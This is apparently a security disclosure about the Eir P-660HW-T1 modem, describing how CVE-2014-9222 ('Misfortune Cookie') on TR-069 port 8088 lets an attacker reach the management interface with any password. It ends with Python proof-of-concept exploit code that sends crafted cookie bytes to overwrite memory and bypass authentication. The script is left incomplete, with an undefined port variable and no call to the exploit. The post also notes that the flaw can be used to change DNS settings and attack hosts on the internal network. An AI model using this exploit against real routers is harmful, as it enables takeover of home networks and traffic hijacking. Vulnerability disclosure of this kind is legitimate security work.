Eir P-660HW-T1 Vulnerability


Yet another Eir modem is hackable remotely, the P-660HW-T1. This is one
of the older models Eir use. It hasn’t had a firmware update since 2010.

This modem is based on ZynOS unlike the D1000, which was based on Linux. This makes it useless for DDOS worms based on Linux but this exploit could still be used to hack internal hosts on the networks by changing the DNS server.

The exploit uses the TR-069 port to communicate with the modem.
The P-660HW-T1 uses a non-standard port for TR-069, port 8088. This port is not scanned by Shodan.io so I am unable to give an estimate of how many modems are affected.

The exploit uses CVE-2014-9222, more commonly known as the “Misfortune Cookie” vulnerability. CVE-2014-922 allows memory to be overwritten using specially crafted cookies.

After running the exploit, the web management interface can be accessed on port 8088. Any password can be used to log in.

These brings the total number of Eir modems with serious bugs to three.

  1. D1000
  2. P-660HN-T1A_IPv6
  3. P-660HW-T1

Proof of Concept Code:

#!/usr/bin/env python
# Eircom "P-660HW-T1 v3" (rebranded ZyXEL) WAN-side Exploit
# Tested on firmware version V3.70(BOE.4)D0 | 08/23/2010
# This exploit uses CVE-2014-9222 to gain access to the
# web interface from port 8088. Any password can be used
# to log in.
# Author: kenzo (at) tuta (dot) io
import sys
import requests


class exploit:

    def run(self, router_ip):
        #Bypass the CWMP port check. Bypass the password check
        headers = {"Cookie": "C88605=AAAAAAAA;C107257012=\x08\x0b\x27\x19\x66\x40\xb0\x21;C107257012=\x08\x0b\x27\x19"}  

        req = requests.get("http://" + router_ip +":" + PORT + "/",  headers = headers)
        if (req.status_code == 200):
            print("The exploit was sent successfully. Try accessing the management interface on port " + PORT)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Please supply an ip address")

    router_ip = sys.argv[1]